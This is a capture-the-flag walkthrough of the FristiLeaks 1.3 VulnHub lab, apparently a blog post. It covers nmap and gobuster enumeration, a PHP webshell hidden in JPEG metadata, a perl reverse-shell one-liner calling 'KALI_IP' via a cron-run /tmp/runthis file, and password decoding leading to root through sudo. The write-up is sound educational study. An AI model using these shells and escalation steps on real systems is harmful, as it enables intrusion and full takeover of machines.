[VH] Fristileaks 1.3

Intro#

Today I am hacking the Dutch informal hackers group called FristiLeaks. I’ll start with enumerating the web-service and abusing it to upload a web-then-reverse-shell, then I am going to utilise cron-enabled scripts and perl to escalate privileges both horizontally and vertically. Ultimately, I will decode the root’s password and pwn the target.

Enumeration#

Nmap#

I kicked off the reconnaissance with a basic Nmap scan to identify open ports and services on the target:

nmap -sV target.local -oN nmap.txt -vv
# ...
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

The scan revealed that only port 80 was open, running an Apache httpd server.

Meanwhile I ran full ports scan (-p-) and an UDP (-sU) scan to see if there are any other open ports. These didn’t yield any results though.

Port 80#

Upon visiting http://target.local, a webpage containing a link to x.com/tags/fristileaks and an image. There was nothing of interest here. Additionally I checked the webpage’s source code, again, to no avail.

To explore potential paths, I ran gobuster scan against the HTTP server, using the dirb/big.txt wordlist.

gobuster dir -u target.local -w /usr/share/wordlists/dirb/big.txt
# ...
/.hta                 (Status: 403) [Size: 206]
/.htaccess            (Status: 403) [Size: 211]
/.htpasswd            (Status: 403) [Size: 211]
/cgi-bin/             (Status: 403) [Size: 210]
/images               (Status: 301) [Size: 235] [--> http://target.local/images/]
/index.html           (Status: 200) [Size: 703]
/robots.txt           (Status: 200) [Size: 62]

The /images directory listed 2 files, one of which was bassically making fun of me upfront.

Interestingly, exploring /robots.txt revealed hidden paths such as /beer, /cola, and /sisi, each displaying the same image above.

Attempting to find hidden directories using gobuster on the paths found in robots.txt did not prove useful either.

💡 Meanwhile the full Nmap scan finished and revealed a 28928 port, however I didn’t know what to do about it at the time.

nmap -sT target.local -p-
# ...
PORT      STATE SERVICE VERSION
28928/tcp open  unknown syn-ack

Copy

Ultimately I ran next gobuster scan, using rockyou.txt as a wordlist this time.

gobuster dir -u target.local -w ~/Desktop/rockyou.txt

/fristi               (Status: 301) [Size: 235] [--> http://target.local/fristi/]

💡 Be curious

Out of curiosity I googled what fristi means and… well, it’s a drink.

Remember the drink fristi advice from the homepage? Pretty effin’ ovbious.

Anyways, upon exploring /fristi, a Login Form was discovered.

Exploitation#

Inspecting the form’s source code exposed a commented-out, base64-encoded image. Might be useful later.

The Login Form itself made a POST request to checklogin.php upon submitting. Although I attempted the SQL injection, it proved fruitless.

However, further examination of the source code revealed something that looked like a login:

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

Using both the decoded image, I found the valid credentials: eezeepz:keKkeKKeKKeKkEkkEk.

Logging in allowed the uploading of files, with images being the only accepted format:

Uploading the download.png image resulted with saving the image in http://target.local/fristi/uploads/download.png:

Noice.

Webshell#

At this point I wanted to upload a webshell. The issue was the only valid files were images, so I had to embed the PHP code somehow.

Using jhead I modified the JPEG’s metadata to include a PHP webshell:

<?php
echo "Hello, world";
$cmd = $_GET['cmd'];

echo "<pre>";
system($cmd);
echo "</pre>"

I saved as shell.php.jpg and after uploading it permitted executing commands:

http://target.local/fristi/uploads/shell.php.jpg?cmd=ls

This provided access to the web server with the user apache.

❗ I will use code-block instead of screenshots from now on.

# webshell
id

uid=48(apache) gid=48(apache) groups=48(apache)

Revshell#

After confirming the vulnerability, I’ve spawned the nc on port 2345 and upgraded the webshell into a reverse shell using php-reverse-shell.php:

# webshell -> revshell
nc -lvp 2345
listening on [any] 2345 ...
# ...
sh-4.1$ id

uid=48(apache) gid=48(apache) groups=48(apache)

With a stable shell, I spawned a proper PTY using python:

python -c 'import pty; pty.spawn("/bin/bash")'

Now onto the privilege escalation.

Priv Esc to admin#

Exploring the /home directory revealed users admin, eezeepz, and fristigod.

# revshell
ls /home

admin
eezeepz
fristigod

Investigating /home/eezeepz, apart of a list of binaries, an interesting note was relvealed.

# revshell
ls -l | grep notes
# ...
-r--r--r--. 1 eezeepz eezeepz    514 Nov 18  2015 notes.txt

cat notes.txt

Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don\'t forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

A note indicated restricted access but offered additional commands available from the /home/admin level.

/tmp/runthis#

Checking the /tmp/runthis script, it executed commands and stored results in /tmp/cronresult:

# /tmp/runthis

#!/bin/sh
/usr/bin/id

cat /etc/cronresult

executing: /usr/bin/id
uid=501(admin) gid=501(admin) groups=501(admin)

The script was executing the commands using the admin account, so I tried to spin another reverse shell, this time as an admin.

I’ve compared the binaries available in /usr/bin with GTFObins and found a common denominator of perl:

# /tmp/runthis

#!/bin/bash
/usr/bin/perl -e 'use Socket;$i="KALI_IP";$p=2346;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# kali

nc -lvp 2346

# revshell
id

uid=501(admin) gid=501(admin) groups=501(admin)

Perfect.

Priv Esc to root#

I listed files inside /home/admin and the whoisyourgodnow.txt looked interesting.

ls

cat
chmod
cronjob.py
cryptedpass.txt
cryptpass.py
df
echo
egrep
grep
ps
whoisyourgodnow.txt

The contents seemed to be base64-encoded, but decoding it as is didn’t actually work.

Then I checked hte cryptpass.py file to see it encoded the given string with base64, reversed the result and then encoded it again with rot13:

python cryptpass.py "this is a test"

=D3pyEUVuOlpcOlpcuTq

Knowing that, I’ve prepared a quick decryption recipe in CyberChef:

This way I decoded whoisyourgodnow.txt:

LetThereBeFristi!

and then, cryptedpass.txt:

thisisalsopw123

Now, I tried sudo -l to see what commands admin might have the access to.

sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for admin: thisisalsopw123

Sorry, user admin may not run sudo on localhost.
[admin@localhost ~]$

This didn’t prove useful though. But hey, it’s perfectly normal to have an admin account that cannot do a thing, right?

A short while after, using ls -l, I learned that whoisyourgodnow.txt file was created by no other than fristigod. Why shouldn’t I try to log in as him?

su -l fristigod
Password: LetThereBeFristi!

-bash-4.1$ id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Hello, fristigod.

ls -a
.  ..  .bash_history  .secret_admin_stuff

cd .secret_admin_stuff
ls -l

total 8
-rwsr-sr-x 1 root root 7529 Nov 25  2015 doCom


./doCom
Nice try, but wrong user ;)

Well, at least I progressed a tiny little bit.

sudo -l

[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host: requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

I’ve been staring at it for a quite while, but ultimately I noticed it.

The (fristi : ALL) Moment#

I was stuck with fristigod as an username, and didn’t notice fristi is another user that should be able to execute the command!

sudo -u fristi ./doCom /bin/bash
[sudo] password for fristigod: LetThereBeFristi!

bash-4.1\#

Pwned#

whoami
root

ls /root
fristileaks_secrets.txt


cat /root/fristileaks_secrets.txt

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: <redacted>

Pwned.

Not sure about these 4 hours tho.